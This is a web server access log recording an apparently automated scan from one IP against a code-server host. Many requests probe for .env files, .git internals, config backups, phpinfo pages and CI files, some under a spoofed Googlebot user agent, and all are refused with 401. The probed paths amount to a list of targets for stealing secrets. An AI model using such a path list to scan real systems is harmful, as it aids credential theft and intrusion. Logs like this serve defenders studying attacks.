+[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/__env.js" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/__config.js" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/runtime~main.js" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/api/config" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/workbox.js" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/api/v1/config" [Client 216.81.248.13] [Length 661] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/sw.js" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/webpack-runtime.js" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/stripe.js" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/webpack.runtime.js" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/_next/static/chunks/framework.js" [Client 216.81.248.13] [Length 662] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/static/js/4.chunk.js" [Client 216.81.248.13] [Length 661] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/assets/main.js" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/_next/static/chunks/0.js" [Client 216.81.248.13] [Length 662] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/vite.config.js" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/_next/static/chunks/1.js" [Client 216.81.248.13] [Length 662] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/payment.js" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/@vite/env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/src/env.d.ts" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/_next/static/chunks/commons.js" [Client 216.81.248.13] [Length 662] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/static/js/3.chunk.js" [Client 216.81.248.13] [Length 661] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/public/build/entry.client.js" [Client 216.81.248.13] [Length 661] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/vite.config.ts" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/_app/immutable/chunks/index.js" [Client 216.81.248.13] [Length 662] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/static/js/5.chunk.js" [Client 216.81.248.13] [Length 661] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/_app/env.js" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/astro.config.mjs" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/public/build/manifest.json" [Client 216.81.248.13] [Length 661] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/_astro/hoisted.js" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/_app/immutable/entry/start.js" [Client 216.81.248.13] [Length 662] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/build/index.js" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/_astro/client.js" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.git/HEAD" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/build/qwik-loader.js" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/build/q-manifest.json" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.gitconfig" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/dist/solid.js" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/public/page-data/app-data.json" [Client 216.81.248.13] [Length 661] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.git/refs/heads/production" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/rust/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.git/refs/heads/main" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/dist/client.js" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.git/refs/heads/develop" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.git/logs/refs/stash" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/checkout.js" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.git/objects/pack/pack-*.idx" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/bundle.js" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.git/refs/heads/master" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.git/hooks/update" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.git/hooks/pre-receive" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.git/refs/remotes/origin/master" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/runtime.js" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.git/packed-refs" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.git/logs/refs/heads/main" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/main.js" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.git/objects/pack/pack-*.pack" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.git/hooks/post-commit" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.github/workflows/build.yml" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.github/workflows/main.yml" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.github/workflows/ci.yml" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.github/workflows/release.yml" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.git/modules/" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/app.js" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.github/workflows/test.yml" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.github/workflows/production.yml" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.circleci/config.yml" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.github/workflows/publish.yml" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/azure-pipelines.yml" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/bitbucket-pipelines.yml" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.github/workflows/cd.yml" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/circle.yml" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/cloudbuild.json" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/Dockerfile" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/appveyor.yml" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/cloudbuild.yaml" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.github/dependabot.yml" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/docker-compose.yaml" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/info.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/php.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/_phpinfo.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/php-info.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/debug.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/p.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/bootstrap/cache/config.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/i.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/__phpinfo.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/phpinfo2.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/phpversion.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/build/main.js" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/phpi.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/sysinfo.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/tests/phpinfo.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/server-status.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/_info.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/admin/test.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/administrator/phpinfo.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/test/phpinfo.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/debug/info.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/temp/phpinfo.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/tmp/phpinfo.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/cgi-bin/phpinfo.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/cgi-bin/php.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/fcgi-bin/phpinfo.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/wp-config.php.save" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/wp-config.php.old" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/wp-config.txt" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/app/config/parameters.yml.bak" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/configuration.php.bak" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/db.php.bak" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/env.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/wp-config.bak" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/config.php~" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/wp-config.php~" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/wp-config.php.txt" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/wp-config.php.bak" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.netlify/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/wp-config.old" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/sites/default/settings.php.bak" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/local.php.bak" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/config.php.old" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/settings.local.php.bak" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/application/config/database.php.bak" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/storage/framework/sessions" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/public/js/app.js" [Client 216.81.248.13] [Length 661] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/config/database.php.bak" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/static/js/app.js" [Client 216.81.248.13] [Length 661] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/wp-config-sample.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" 